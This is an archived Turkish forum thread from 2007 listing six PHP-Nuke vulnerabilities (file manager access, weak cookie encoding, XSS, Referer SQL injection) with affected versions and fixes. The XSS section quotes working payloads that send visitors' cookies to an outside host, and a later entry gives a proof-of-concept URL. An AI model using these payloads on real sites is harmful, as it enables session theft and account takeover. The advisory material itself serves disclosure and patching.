PDA

Orijinalini görmek için tıklayınız : PHP-Nuke AçıkLarı...!!!


Poyraz
12-03-2007, 05:52
Corbada Birazda Bizim Tuzumuz OLsun Php TabanLi SiteLerin AcikLari..

1-) PHP Nuke dosya kopyalama ve silme açığı

PHP Nuke, PHP script dili ile uygulanmış bir web portal yaratma ve yönetim
paketidir. Varsayılan kurulum ile, sunucu dosya sistemindeki dosyaları kopyalama
ve silmede kullanılabilen 'admin/case/case.filemanager.php' script`i gelmektedir.
Script, sadece kimlik tanılamasında sorumlu bir administrative script`ten çağrıldığına
emin olan bir kod içeriyor fakat bunun uygulanışı hatalı. Sonuç olarak uzaktaki
herhangi bir kullanıcı kimlik tanılaması olmadan direk olarak script`i çağırabilir ve
script`in çalıştığı kullanıcı haklarına göre sunucu üzerinde herhangi bir dosyayı
kopyalayabilir, silebilir.

Çözüm:

Magnux Software aşağıdaki çözümü önermiş:
Web sunucusu dosya sistemine erişimi engellemek için aşağıdaki komutlar
kullanılabilir:
# cd php-nuke-document-root
# chmod 0 admin/case/case.filemanager.php

Henüz bir yama çıkmadı

2-)PHP Nuke kullanıcı cookie`si zayıf kriptolama açığı

Bir kullanıcıya PHP-Nuke tabanlı bir sayfada kimlik tanılaması uygulandığında
kullanıcı hesabı ve şifreyi içeren bir cookie yaratılıyor. Şifre 'Base 64 encoding' ile
kodlanıyor ve cookie içeriğine erişebilen herkes tarafından kolaylıkla dekod
edilebilir. Bunun sonucunda kullanıcının hesabının ele geçirilmesi mümkün.
PHP-Nuke`un eski sürümlerininde bu açıktan etkilenmesi muhtemel. PostNuke
0.6.4`de bu açıktan etkileniyor.

Çözüm:

Henüz bir yama çıkmadı

3-)PHP-Nuke çapraz site betik çalıştırma açıkları

PHP-Nuke'da çeşitli çapraz site betik çalıştırma (XSS-Cross Site Scripting) açıkları olduğu rapor edildi.
Bir saldırgan, kullanıcıların kötü amaçlı bir linki ziyaret etmesini sağlayarak bu açıktan yararlanabilir. Saldırganın sağladığı HTML ve betik kodu web istemcisinde çalıştırılabilir.

Saldırganlar bu açığı web içeriğini farklı göstermek veya çerez-tabanlı kimlik tanılama bilgilerini çalmak için kullanabilirler.

öRNEK;

Aşağıdaki örnekler Matthew Murphy tarafından sağlanmış:

<SCRI*PT>location.href="http://www.techie.hopto.org/fetch.php?
email=mattmurphy@kc.rr.com&ref="+document.URL+"cookie="+document.cookie;

<B
STYLE="left:expression(eval('location.href=\'http://www.techie.hopto.org/
fetch.php?email=mattmurphy@kc.rr.com&ref=\'+document.URL+\'cookie=\'+
document.cookie'))">Bold text -- or an attack?</B>
<B
ONCLICK="location.href='http://www.techie.hopto.org/fetch.php?
email=mattmurphy@kc.rr.com&ref='+document.URL+'cookie='+document.cookie">
Don't Click</B>
<B
ONMOUSEOVER="location.href='http://www.techie.hopto.org/fetch.php?
email=mattmurphy@kc.rr.com&ref='+document.URL+'cookie='+document.cookie">Keep
Away!</B>


Çözüm:

Henüz bir yama çıkmadı.

Açığı gerçekleştirme
Yerel:

Hayır

Uzaktan:

Evet

Etkilenen Sistemler

Etkilenenler:

Francisco Burzi PHP-Nuke 5.0
Francisco Burzi PHP-Nuke 5.0.1
Francisco Burzi PHP-Nuke 5.1
Francisco Burzi PHP-Nuke 5.2 a
Francisco Burzi PHP-Nuke 5.2
Francisco Burzi PHP-Nuke 5.3.1
Francisco Burzi PHP-Nuke 5.4
Francisco Burzi PHP-Nuke 5.5
Francisco Burzi PHP-Nuke 5.6
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 BETA 1

4-)PHP-Nuke HTTP "referer" SQL sorgusu ekleme açığı

HTTP başlığının referer alanında gönderilen veriler, index.php dosyasında SQL sorgusunda kullanılmadan önce doğru olarak filtrelenmiyor.
Açığın 7.9 sürümünde olduğu onaylandı ve 8.0 sürümünün de etkilendiği rapor edildi. Diğer sürümler de etkileniyor olabilir.

Çözüm:

index.php kaynak kodunda değişiklik yaparak doğru filtrelemenin yapılmasını sağlayın.

Etkilenen Sistemler
Etkilenenler:

PHP-Nuke 5.x
PHP-Nuke 6.x
PHP-Nuke 7.x
PHP-Nuke 8.x

Bu SistemLe Bana SaLdirmisLardi SQL Den 2-3 Dosya SiLindi YedekLe Kurtardim:)

5-)PHP-Nuke Signature alanı XSS açığı

PHP-Nuke'ta yeni bir çapraz site betik çalıştırma açığı bulunduğu rapor edildi. Web isteklerinin düzgün kontrol edilmemesi sonucu betik kodlarının PHP script isteklerine gömülmesi mümkün oluyor.
Bu sayede uzaktaki bir saldırgan çerez-tabanlı kimlik tanılama bilgilerini çalabilir.

Çözüm:

Henüz bir yama çıkmadı.

Açığı gerçekleştirme
Yerel:

Hayır

Uzaktan:

Evet

Etkilenen Sistemler
Etkilenenler:

Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 BETA 1

6-)PHPNuke Cross-Site Scripting güvenlik açığı

PHPNuke cross-site scripting açığından etkileniyor. Kötü amaçlı script kodunu içeren
PHPNuke kullanıcı bilgileri sayfası user.php`ye bir link yaratmak mümkün.
Durumdan şüphelenmeyen bir web kullanıcısı linke tıkladığında kötü amaçlı kod
çalışıyor.
Bu saldırı ile bir kullanıcının, etkilenen PHPNuke sitesine ait cookie`lerdeki kimlik
tanılama bilgileri çalınabilir.
PostNuke`un da etkilendiği rapor edildi.
Aşağıdaki örnek bir alarm kutusunu görüntülenmesini sağlıyor:
http://phpnukesite/user.php?op=userinfo&uname=<script>alert(document.cookie);</script>

Çözüm:
Geçici çözüm:
Web browser`ın özelliklerini kullanarak JavaScript çalıştırılmasını kapatın.
Henüz bir yama çıkmadı.

Etkilenen Sistemler
Etkilenenler:

Francisco Burzi PHP-Nuke 1.0
Francisco Burzi PHP-Nuke 2.5
Francisco Burzi PHP-Nuke 3.0
- Linux kernel 2.2
Francisco Burzi PHP-Nuke 4.0
Francisco Burzi PHP-Nuke 4.3
Francisco Burzi PHP-Nuke 4.4
Francisco Burzi PHP-Nuke 4.4.1a
Francisco Burzi PHP-Nuke 5.0
Francisco Burzi PHP-Nuke 5.0.1
Francisco Burzi PHP-Nuke 5.1
Francisco Burzi PHP-Nuke 5.2a
Francisco Burzi PHP-Nuke 5.2
Francisco Burzi PHP-Nuke 5.3.1
Francisco Burzi PostNuke 0.62
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32
Francisco Burzi PostNuke 0.63
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32
Francisco Burzi PostNuke 0.64
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32

kAcAhK
12-03-2007, 10:14
teşekkürler çünkü bu sitelerin vb den az açıkları var ve bulunması vb den zor.....